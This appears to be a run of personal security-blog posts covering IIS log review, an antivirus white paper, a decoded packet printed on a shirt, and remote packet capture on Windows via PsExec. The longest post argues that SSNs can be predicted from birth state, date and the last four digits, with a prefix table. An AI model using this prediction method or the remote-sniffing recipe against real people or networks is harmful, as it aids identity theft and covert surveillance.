Blackberry posts their ranges in this article.

Continue to review your IIS logs to watch for other User-Agents. The following unix commands will show you all the User-Agents accessing your system.

cat \windows\system32\logfiles\w3svc1\* | awk '{print $11}' | sort | uniq

Effectiveness of Antivirus

2008-04-02T17:13:00.002-04:00

I finished and published my white paper on the Effectiveness (or lack there of) of Antivirus software in detecting metasploit payloads. Check it out..

http://www.sans.org/reading_room/whitepapers/casestudies/2134.php

More to the SANS shirt

2008-04-02T17:08:00.005-04:00

DRAT. That wasn't it. As soon as I reread my own entry I saw the "45 00..." and recognized it as the tell sign of an IP packet header. Wrap it in a Ethernet frame and you find its an UDP packet DNS query to http://www.sans.org/.

Sans Shirt... Is that it?

2008-03-25T16:08:00.003-04:00

So I got this black shirt at sans with a bunch of Hex on the back. I've tried stuffing it in various drawers and corners of my closet. At least once I was able to cause a hamper overflow. I began to wonder if I had been 0wn3d. Decoding the hex I get what is below. Is there more to it?

E..#....@.V..........5....W;.............www.sans.org..............X..A..jThe trustd source for usted source)for information security training acd research. www.giac.org A GIAC certification is your assurance the student has `astered the sans coureware.

Here is the hex.

45 00 01 23 0D E8 00 00 40 11 56 B9 0A 00 01 01 0A 00 01 02 00 35 07 C0 00 E1 57 3B 00 02 89
80 00 01 00 01 00 00 00 03 03 77 77 77 04 73 61 6E 73 03 6F 72 67 00 00 01 00 01 C0 0C 00 01
00 01 00 00 02 58 00 04 41 AD DA 6A 54 68 65 20 74 72 75 73 74 64 20 73 6F 75 72 63 65 20 66
6F 72 20 75 73 74 65 64 20 73 6F 75 72 63 65 29 66 6F 72 20 69 6E 66 6F 72 6D 61 74 69 6F 6E
20 73 65 63 75 72 69 74 79 20 74 72 61 69 6E 69 6E 67 20 61 63 64 20 72 65 73 65 61 72 63 68
2E 20 77 77 77 2E 67 69 61 63 2E 6F 72 67 20 41 20 47 49 41 43 20 63 65 72 74 69 66 69 63 61
74 69 6F 6E 20 69 73 20 79 6F 75 72 20 61 73 73 75 72 61 6E 63 65 20 74 68 65 20 73 74 75 64
65 6E 74 20 68 61 73 20 60 61 73 74 65 72 65 64 20 74 68 65 20 73 61 6E 73 20 63 6F 75 72 65
77 61 72 65 2E

Windows TCPDUMP without installing WINPCAP!!!!!!!!

2007-07-11T10:03:00.001-04:00

IMHO, This is a long time coming for Windows. I love this thing. You probably already know about it, but I haven't read much about it anywhere and Its been very useful to me. Its a version of tcpdump for windows that doesn't require I install the Winpcap drivers. I use it along with PSEXEC to start remote sniffing probes on Windows workstations. I'm sure its NOT forensically sound to do this in on a box that may contain evidence because of the swap file, but for information gathering something like this is very useful.

So with this..
http://www.microolap.com/downloads/tcpdump/tcpdump.zip

Something like this

\mytools\psexec.exe \\remotecomputer -c \mytools\tcpdump.exe -i 1 -s0 -w \\remotefileserver\share\capturename.cap

Lets me turn every node on my network into a remote Snort probe, or just capture anamolies!

Went Rafting. Had a lot of fun

2007-06-28T12:05:00.000-04:00

What are the last 4 digits of your SSN?

2007-05-28T18:18:00.000-04:00

“What are the last 4 digits of your SSN?” Nowadays, it seems to be accepted as a standard question to validate your identity. But throw in “What is your date of birth” and “What is your birth place?” and you may have given away your identity. I don't think it would be uncommon to find those three questions asked together in many cognitive password reset systems. Last week I answered the question with my bank and it made me wonder how predictable is my SSN with the rest of the information my bank has on me. I did a little research and sure enough, it seems feasible to me that with a few pieces of info and your last four an attacker could reasonable predict your SSN. The number of permutations are certainly low enough to make a brute force attack feasible.

First of all lets clarify something. The question “Where were you born?” is probably a good indicator of the actual question that needs to be asked which is “In what state did you apply for a SSN?” And “What is your birth date?” is not as accurate as “What date did you apply for a SSN?” But in a non-scientific polling of people I have asked it seems that your probably close enough.

Now lets look at predicting your SSN…

Your SSN is in the following format AAA-BB-CCCC. AAA is a number that represents the state in which you applied for the SSN. These numbers well documented and available on the Social Security Administrations website. For example, Were you born in Nevada? Your SSN starts with 530. New Mexico? 525. Most states have a range of a few digits. But lets say you were issued your SSN in New Mexico and you gave me your last 4; with no other information it will only require 99 guesses to guarantee I will predict your SSN.. In 1973 these numbers became even more closely tied to your geography. Now all number are issued by the central office in Baltimore based upon the ZIPCODE of the submitter. So those numbers can be predicted based upon the date your SSN was applied for and/or your zip code. But brute forcing 99 whole possibilities, that could take a while. But perhaps its even easier than that.

The second group of digits (BB) are handed out in a semi-sequential, but still chronological order. Therefore with the correct insight into which numbers where issued at what time you could predict this information. A good explanation of how these numbers are issued is in the “GROUP NUMBER” section on this site. http://www.usrecordsearch.com/ssn.htm

So what would it take to build a database of middle number and when they were issued? Well, looks like the SSA has already done that for us and published it on their website. They have what they refer to as the “High group number”. Every month they predict what the highest middle digits are for each of the geographic codes. The numbers can be found here…

http://www.ssa.gov/employer/ssnvhighgroup.htm

So in April 2006 the middle digits for the first three state codes were :
001 = 04
002 = 02
003 = 02

Then in May of 2006 they became
001=04
002=04 (the next group according to their sequence)
003=02

In October of 2006 geographic code 003 began issuing number with 04 as the middle two
001=04
002=04
003=04

In May of 2007 geographic code 001 began issuing number with 06 as the middle two.
001=06
002=04
003=04

Today the history of "high groups" only date back to November 2003 on the main website. But 4 years seems to be long enough to determine how quickly the digits in various geographical areas change. That information combined with data from other public sources such as the number of births in a state in a given year would be helpful in establishing a prediction database.

Reading these descriptions it is obvious that numbers are issued chronologically based upon geography of the requester. So how difficult would it be for a computer to either accurately predict or come reasonably close such that a brute force is reasonable.

Here is a table of states and SSN geographic codes

001-003 NH 400-407 KY 530 NV
004-007 ME 408-415 TN 531-539 WA
008-009 VT 416-424 AL 540-544 OR
010-034 MA 425-428 MS 545-573 CA
035-039 RI 429-432 AR 574 AK
040-049 CT 433-439 LA 575-576 HI
050-134 NY 440-448 OK 577-579 DC
135-158 NJ 449-467 TX 580 VI Virgin Islands
159-211 PA 468-477 MN 581-584 PR Puerto Rico
212-220 MD 478-485 IA 585 NM
221-222 DE 486-500 MO 586 PI Pacific Islands*
223-231 VA 501-502 ND 587-588 MS
232-236 WV 503-504 SD 589-595 FL
237-246 NC 505-508 NE 596-599 PR Puerto Rico
247-251 SC 509-515 KS 600-601 AZ
252-260 GA 516-517 MT 602-626 CA
261-267 FL 518-519 ID 627-645 TX
268-302 OH 520 WY 646-647 UT
303-317 IN 521-524 CO 648-649 NM
318-361 IL 525 NM *Guam, American Samoa,
362-386 MI 526-527 AZ Philippine Islands,
387-399 WI 528-529 UT Northern Mariana Islands

650-699 unassigned, for future use
700-728 Railroad workers through 1963, then discontinued
729-799 unassigned, for future use
800-999 not valid SSNs. Some sources have claimed that numbers
above 900 were used when some state programs were converted
to federal control, but current SSA documents claim no
numbers above 799 have ever been used.

http://www.usrecordsearch.com/ssn.htm
http://en.wikipedia.org/wiki/Social_Security_number
http://www.ssa.gov/employer/ssnvhighgroup.htm